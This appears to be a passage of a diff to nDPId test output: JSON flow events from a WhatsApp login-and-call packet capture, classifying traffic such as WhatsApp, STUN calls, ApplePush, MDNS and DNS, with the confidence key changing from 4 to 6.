-00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":180,"flow_first_seen":1432582227643,"flow_last_seen":1432582361929,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12974,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1432582303186,"flow_last_seen":1432582310134,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":528,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":52794,"dst_port":51727,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1432582228503,"flow_last_seen":1432582353955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4474,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1432582247125,"flow_last_seen":1432582324191,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 
-00840{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":464,"flow_first_seen":1432582258730,"flow_last_seen":1432582268457,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":483,"flow_tot_l4_payload_len":33432,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":51518,"dst_port":9344,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582227526,"flow_last_seen":1432582227594,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} 
-00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1432582227604,"flow_last_seen":1432582260448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15132,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1432582238792,"flow_last_seen":1432582267974,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
-00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267973,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267973,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.91.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238792,"flow_last_seen":1432582267975,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267972,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.85.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267971,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.64.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267970,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.70.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
-00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238790,"flow_last_seen":1432582267969,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582227595,"flow_last_seen":1432582227624,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} -00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432582267983,"flow_last_seen":1432582311138,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":198,"flow_first_seen":1432582303300,"flow_last_seen":1432582311036,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":22102,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":52794,"dst_port":9665,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432582246280,"flow_last_seen":1432582336425,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2008,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":180,"flow_first_seen":1432582227643,"flow_last_seen":1432582361929,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12974,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1432582303186,"flow_last_seen":1432582310134,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":528,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":52794,"dst_port":51727,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1432582228503,"flow_last_seen":1432582353955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4474,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1432582247125,"flow_last_seen":1432582324191,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 
+00840{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":464,"flow_first_seen":1432582258730,"flow_last_seen":1432582268457,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":483,"flow_tot_l4_payload_len":33432,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":51518,"dst_port":9344,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582227526,"flow_last_seen":1432582227594,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} 
+00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1432582227604,"flow_last_seen":1432582260448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15132,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1432582238792,"flow_last_seen":1432582267974,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267973,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267973,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.91.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238792,"flow_last_seen":1432582267975,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267972,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.85.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267971,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.64.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267970,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.70.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238790,"flow_last_seen":1432582267969,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582227595,"flow_last_seen":1432582227624,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} 